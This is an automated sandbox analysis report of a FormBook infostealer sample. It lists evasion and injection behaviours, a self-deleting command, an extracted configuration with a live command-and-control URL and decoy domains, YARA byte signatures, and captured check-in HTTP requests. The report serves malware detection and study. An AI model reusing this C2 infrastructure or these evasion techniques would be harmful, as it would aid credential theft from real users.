Play interactive tour

Edit tour

Windows Analysis Report JFBlvEr5H9

Overview

General Information

Sample Name:	JFBlvEr5H9 (renamed file extension from none to exe)
Analysis ID:	458762
MD5:	214b1ddf045e4d6fdd73a5c8788d2adc
SHA1:	8bb7c462fb649d16edb98ab526df8475a329cc71
SHA256:	d8e25ce44c46057985a0467adcf4fc12d8beac599e3031f6674fd1e01988267e
Tags:	32exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

JFBlvEr5H9.exe (PID: 2036 cmdline: 'C:\Users\user\Desktop\JFBlvEr5H9.exe' MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)

JFBlvEr5H9.exe (PID: 1760 cmdline: C:\Users\user\Desktop\JFBlvEr5H9.exe MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

mstsc.exe (PID: 6868 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)

cmd.exe (PID: 7048 cmdline: /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x4f0dc0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x4f114a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x517fe0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x51836a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x4fce5d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x52407d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4fc949:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x523b69:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x4fcf5f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x52417f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4fd0d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x5242f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x4f1b62:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x518d82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x4fbbc4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x522de4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x4f28da:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x519afa:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x501f4f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x52916f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x502ff2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4fee81:$sqlite3step: 68 34 1C 7B E1 0x4fef94:$sqlite3step: 68 34 1C 7B E1 0x5260a1:$sqlite3step: 68 34 1C 7B E1 0x5261b4:$sqlite3step: 68 34 1C 7B E1 0x4feeb0:$sqlite3text: 68 38 2A 90 C5 0x4fefd5:$sqlite3text: 68 38 2A 90 C5 0x5260d0:$sqlite3text: 68 38 2A 90 C5 0x5261f5:$sqlite3text: 68 38 2A 90 C5 0x4feec3:$sqlite3blob: 68 53 D8 7F 8C 0x4fefeb:$sqlite3blob: 68 53 D8 7F 8C 0x5260e3:$sqlite3blob: 68 53 D8 7F 8C 0x52620b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: JFBlvEr5H9.exe PID: 2036	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.JFBlvEr5H9.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.JFBlvEr5H9.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.JFBlvEr5H9.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
4.2.JFBlvEr5H9.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.JFBlvEr5H9.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.JFBlvEr5H9.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.anewdistraction.com/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Multi AV Scanner detection for submitted file

Show sources

Source: JFBlvEr5H9.exe	Virustotal: Detection: 20%			Perma Link
Source: JFBlvEr5H9.exe	ReversingLabs: Detection: 21%

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: JFBlvEr5H9.exe

Joe Sandbox ML: detected

Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: JFBlvEr5H9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: JFBlvEr5H9.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe, 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe
Source:	Binary string: mstsc.pdbGCTL source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
Source:	Binary string: mstsc.pdb source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_01082130
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_01082121
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_01083B22
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_01083B30
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4x nop then pop edi	4_2_00416282
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4x nop then pop ebx	4_2_00406A94
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4x nop then pop edi	21_2_00706282
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4x nop then pop ebx	21_2_006F6A95

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.adultpeace.com/p2io/

Source: global traffic	HTTP traffic detected: GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 52.20.84.62 52.20.84.62

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: global traffic	HTTP traffic detected: GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.pyithuhluttaw.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 03 Aug 2021 16:14:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0

Source: JFBlvEr5H9.exe, 00000000.00000003.238128917.0000000005916000.00000004.00000001.sdmp	String found in binary or memory: http://en.w
Source: JFBlvEr5H9.exe, 00000000.00000003.237660704.0000000005933000.00000004.00000001.sdmp	String found in binary or memory: http://en.wikipedia
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: JFBlvEr5H9.exe, 00000000.00000003.240494408.0000000005917000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
